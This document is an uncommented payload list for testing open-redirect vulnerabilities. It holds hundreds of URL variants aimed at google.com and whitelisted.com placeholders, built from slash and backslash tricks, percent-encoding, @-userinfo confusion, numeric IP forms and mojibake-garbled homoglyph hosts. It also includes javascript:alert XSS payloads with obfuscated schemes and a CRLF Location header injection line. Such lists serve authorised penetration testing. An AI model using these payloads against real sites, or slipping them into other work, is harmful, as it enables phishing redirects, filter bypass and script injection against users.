3627734734
google.com
/3627734734
ãƒ¼google.com
ã€±google.com
ã‚google.com
@google.com
ã€µgoogle.com
/google.com
ï½°google.com
.google.com
/ï½°google.com
/\3627734734
//google.com
/ã€±google.com
\\google.com
/ã‚google.com
/ã€µgoogle.com
/.google.com
//3627734734
/\google.com
/ãƒ¼google.com
%2f3627734734
///3627734734
";alert(0);//
//google.com/
///google.com
../google.com
//\google.com
/\/google.com
%2fgoogle.com
///google.com/
////3627734734
//;@google.com
/%5cgoogle.com
google%252ecom
////google.com
//google.com//
/\/google.com/
216.58.214.206
<>//google.com
/<>//google.com
google.com/.jpg
http:0xd83ad6ce
/216.58.214.206
///;@google.com
/////google.com
///google.com//
//\/google.com/
http:3627734734
////google.com/
//google%00.com
ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
\/\/google.com/
http:google.com
//%5cgoogle.com
%2fgoogle.com//
/%09/google.com
%2f3627734734//
@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///\;@google.com
////google.com//
/\google%252ecom
//%09/google.com
/\/\/google.com/
/\216.58.214.206
https:google.com
%2f$2f3627734734
$2f%2fgoogle.com
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5cgoogle.com
//216.58.214.206
/ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////google.com/
%2f$2fgoogle.com
http:/google.com
/.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////\;@google.com
/https:google.com
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/google.com
http://3627734734
http:0xd8.3856078
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
%2f216.58.214.206
http://google.com
///216.58.214.206
////%5cgoogle.com
http://0xd83ad6ce
/%2f%2fgoogle.com
///%09/google.com
/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////216.58.214.206
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////%09/google.com
https://google.com
https:/\google.com
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/google.com/%2F.. 
<>//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//google.com/%2f..
//%2f%2fgoogle.com
http://.google.com
/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/http://google.com
http:00330.3856078
/google.com/%2e%2e
%2fgoogle.com%2f%2f
//google.com/%2e%2e
//%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%2f3627734734%2f%2f
/https://google.com
/%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
javascript:alert(1)
http:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
//google.com/%2F.. 
//google.com/%2E%2E
\/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://google.com/
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/\/\google.com
http://;@google.com
%2f216.58.214.206//
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///google.com/%2f..
http:0xd8.072.54990
http://0xd8.3856078
//\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%2f$2f216.58.214.206
//google%E3%80%82com
///google.com/%2e%2e
//%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
javascript:prompt(1)
/javascript:alert(1)
https://google.com//
http://00330.3856078
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////google.com/%2f..
///\;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:472.314.470.462
javascript:alert(1);
/https://google.com/
https://%5cgoogle.com
http:00330.0x3a.54990
http://0xd8.072.54990
https:/%5cgoogle.com/
////%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//javascript:alert(1)
////google.com/%2e%2e
///%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/javascript:alert(1);
javascript:confirm(1)
/https://google.com//
%01https://google.com
http:%0a%0dgoogle.com
/google.com/%2f%2e%2e
/http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//google.com/%2e%2e%2f
//%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/google.com
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
$2f%2f3627734734%2f%2f
/https://%5cgoogle.com
https://////google.com
$2f%2fgoogle.com%2f%2f
java%0ascript:alert(1)
java%0dscript:alert(1)
//javascript:alert(1);
<>javascript:alert(1);
//https://google.com//
//google.com/%2f%2e%2e
http://472.314.470.462
java%09script:alert(1)
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https:/%5cgoogle.com/
%2f216.58.214.206%2f%2f
http://;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///google.com/%2f%2e%2e
/https://%09/google.com
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///google.com/%2e%2e%2f
http:[::216.58.214.206]
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
@https://www.google.com
//google.com//%2F%2E%2E
http://00330.0x3a.54990
/%5cjavascript:alert(1)
http:0330.072.0326.0316
http:0xd8.0x3a.0xd6.0xce
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//%5cjavascript:alert(1)
////google.com/%2e%2e%2f
/%5cjavascript:alert(1);
/%09/javascript:alert(1)
https://google.com/%2f..
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%E3%80%82pw
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///www.google.com/%2e%2e
javascript://%0aalert(1)
////google.com/%2f%2e%2e
https://%0a%0dgoogle.com
http:%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
ja\nva\tscript\r:alert(1)
//%5cjavascript:alert(1);
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////www.google.com/%2e%2e
/%09/javascript:alert(1);
http://[::216.58.214.206]
https://%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%01https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
http://0330.072.0326.0316
/https://google.com/%2f..
https://google%E3%80%82com
//www.google.com/%2f%2e%2e
https://%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https:///google.com/%2e%2e
google.com/whitelisted.com
$2f%2f216.58.214.206%2f%2f
/https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
whitelisted.com.google.com
http://0xd8.0x3a.0xd6.0xce
//www.google.com/%2e%2e%2f
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
http:///////////google.com
/https://%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://google.com/%2e%2e
Javas%26%2399;ript:alert(1)
whitelisted.com;@google.com
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///www.google.com/%2f%2e%2e
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///www.google.com/%2e%2e%2f
https%3a%2f%2fgoogle.com%2f
http:[::ffff:216.58.214.206]
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////www.google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
//google.com/whitelisted.com
////www.google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//https:///google.com/%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://google.com/%2f%2e%2e
//whitelisted.com@google.com/
google.com%23@whitelisted.com
https:///google.com/%2f%2e%2e
//google.com\@whitelisted.com
//google.com\twhitelisted.com/
https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://www.google.com/%2e%2e
//https://google.com/%2e%2e%2f
///whitelisted.com@google.com/
/%5cwhitelisted.com@google.com
http://[::ffff:216.58.214.206]
/https:///google.com/%2f%2e%2e
//whitelisted.com@google.com//
â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/whitelisted.com
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///www.google.com/%2e%2e
////whitelisted.com@google.com/
//%5cwhitelisted.com@google.com
whitelisted.com;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:XY>.7d8T\205pZM@3627734734
http:whitelisted.com@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@0xd83ad6ce
/%09/whitelisted.com@google.com
http:whitelisted.com@0xd83ad6ce
///whitelisted.com@google.com//
java%0d%0ascript%0d%0a:alert(0)
http:XY>.7d8T\205pZM@0xd83ad6ce
///%5cwhitelisted.com@google.com
////whitelisted.com@google.com//
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://www.google.com/%2e%2e%2f
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/whitelisted.com
//%09/whitelisted.com@google.com
https://www.google.com/%2f%2e%2e
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
//https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https:///www.google.com/%2e%2e
http://XY>.7d8T\205pZM@0xd83ad6ce
http:00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@3627734734
/\whitelisted.com:80%40google.com
http://whitelisted.com@3627734734
////%5cwhitelisted.com@google.com
https:///www.google.com/%2f%2e%2e
http:3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@3627734734
//google.com:80#@whitelisted.com/
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http:XY>.7d8T\205pZM@0xd8.3856078
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@whitelisted.com
///%09/whitelisted.com@google.com
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
http://whitelisted.com@0xd83ad6ce
//google.com:80?@whitelisted.com/
http:whitelisted.com@0xd8.3856078
https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//https://www.google.com/%2e%2e%2f
https://google.com?whitelisted.com
http:XY>.7d8T\205pZM@00330.3856078
////%09/whitelisted.com@google.com
https://google.com\whitelisted.com
http:whitelisted.com@00330.3856078
/https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
http://whitelisted.com@google.com/
https://google.com/whitelisted.com
https://google.com#whitelisted.com
//whitelisted.com@google.com/%2f..
/https:///www.google.com/%2f%2e%2e
/%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://whitelisted.com@google.com
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
http:3H6k7lIAiqjfNeN@00330.3856078
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twhitelisted.com/
https://whitelisted.com.google.com
http://whitelisted.com@0xd8.3856078
https://whitelisted.com@google.com/
http://google.com\twhitelisted.com/
http:XY>.7d8T\205pZM@0xd8.072.54990
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
http://3H6k7lIAiqjfNeN@0xd8.3856078
http:whitelisted.com@0xd8.072.54990
//%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:3H6k7lIAiqjfNeN@0xd8.072.54990
///whitelisted.com@google.com/%2f..
&%0d%0a1Location:https://google.com
http://00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@0xd8.3856078
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://whitelisted.com;@google.com
/%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://XY>.7d8T\205pZM@00330.3856078
http:whitelisted.com@472.314.470.462
http://whitelisted.com@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
////whitelisted.com@google.com/%2f..
///%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://whitelisted.com@google.com/
https://whitelisted.com@google.com//
http://whitelisted.com%2egoogle.com/
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
whitelisted.com@%E2%80%AE@google.com
//%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:3H6k7lIAiqjfNeN@472.314.470.462
///whitelisted.com@google.com/%2e%2e
http:XY>.7d8T\205pZM@472.314.470.462
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://XY>.7d8T\205pZM@0xd8.072.54990
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@whitelisted.com/
http://3H6k7lIAiqjfNeN@0xd8.072.54990
////whitelisted.com@google.com/%2e%2e
http://google.com%23.whitelisted.com/
////%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
https://:@google.com\@whitelisted.com
https://%5cwhitelisted.com@google.com
http://whitelisted.com@0xd8.072.54990
http:whitelisted.com@00330.0x3a.54990
///%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@whitelisted.com/
http:XY>.7d8T\205pZM@00330.0x3a.54990
http://google.com%3F.whitelisted.com/
http://3H6k7lIAiqjfNeN@472.314.470.462
//whitelisted.com@google.com/%2f%2e%2e
////%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://XY>.7d8T\205pZM@472.314.470.462
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/whitelisted.com
http://www.google.com\.whitelisted.com
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5cwhitelisted.com@google.com
http://whitelisted.com@472.314.470.462
//whitelisted.com@google.com/%2e%2e%2f
https://%09/whitelisted.com@google.com
//https://whitelisted.com@google.com//
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
http://google.com:80#@whitelisted.com/
http://google.com:80?@whitelisted.com/
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
///whitelisted.com@google.com/%2e%2e%2f
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:whitelisted.com@0330.072.0326.0316
http://whitelisted.com@00330.0x3a.54990
///whitelisted.com@google.com/%2f%2e%2e
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@0330.072.0326.0316
//google.com\@www.whitelisteddomain.tld
http://whitelisted.com:80%40google.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twhitelisted.com/
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
https://whitelisted.com;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:whitelisted.com@[::216.58.214.206]
//www.whitelisteddomain.tld@google.com/
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
/%5cwww.whitelisteddomain.tld@google.com
http:whitelisted.com@0xd8.0x3a.0xd6.0xce
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://whitelisted.com@google.com/%2f..
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////whitelisted.com@google.com/%2f%2e%2e
http://google.com%5c%5c.whitelisted.com/
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//www.whitelisteddomain.tld@google.com//
///www.whitelisteddomain.tld@google.com/
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://whitelisted.com%2eâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://google.com%2f%2f.whitelisted.com/
////whitelisted.com@google.com/%2e%2e%2f
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http:www.whitelisteddomain.tld@3627734734
https://%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://whitelisted.com@google.com/%2f..
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23.whitelisted.com/
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http:www.whitelisteddomain.tld@0xd83ad6ce
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
http://whitelisted.com@[::216.58.214.206]
http://XY>.7d8T\205pZM@0330.072.0326.0316
https://:@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@whitelisted.com
////www.whitelisteddomain.tld@google.com/
/%09/www.whitelisteddomain.tld@google.com
//%5cwww.whitelisteddomain.tld@google.com
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
http://XY>.7d8T\205pZM@[::216.58.214.206]
///www.whitelisteddomain.tld@google.com//
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%3F.whitelisted.com/
http://whitelisted.com@0330.072.0326.0316
////www.whitelisteddomain.tld@google.com//
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/https://%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@whitelisted.com/
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
//%09/www.whitelisteddomain.tld@google.com
/https://whitelisted.com@google.com/%2e%2e
///%5cwww.whitelisteddomain.tld@google.com
http://whitelisted.com@0xd8.0x3a.0xd6.0xce
http://www.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.whitelisted.com
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@whitelisted.com/
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
https:///whitelisted.com@google.com/%2e%2e
http://google.com&www.whitelisteddomain.tld
///%09/www.whitelisteddomain.tld@google.com
http://whitelisted.com:80%40â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
http://www.whitelisteddomain.tld.google.com
http:www.whitelisteddomain.tld@0xd8.3856078
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
http://www.whitelisteddomain.tld@3627734734
https://whitelisted.com/https://google.com/
http://www.whitelisteddomain.tld@0xd83ad6ce
////%5cwww.whitelisteddomain.tld@google.com
http://google.com\www.whitelisteddomain.tld
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.whitelisted.com/
javascript://whitelisted.com?%a0alert%281%29
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////%09/www.whitelisteddomain.tld@google.com
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//www.whitelisteddomain.tld@google.com/%2f..
http:whitelisted.com@[::ffff:216.58.214.206]
https://whitelisted.com@google.com/%2f%2e%2e
//whitelisted.com@https:///google.com/%2e%2e
http:www.whitelisteddomain.tld@00330.3856078
https://www.whitelisteddomain.tld@google.com
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%5c%5c.whitelisted.com/
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://whitelisted.com@google.com/%2e%2e%2f
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
//XY>.7d8T\205pZM@whitelisted.com@google.com/
//3H6k7lIAiqjfNeN@whitelisted.com@google.com/
/https://whitelisted.com@google.com/%2f%2e%2e
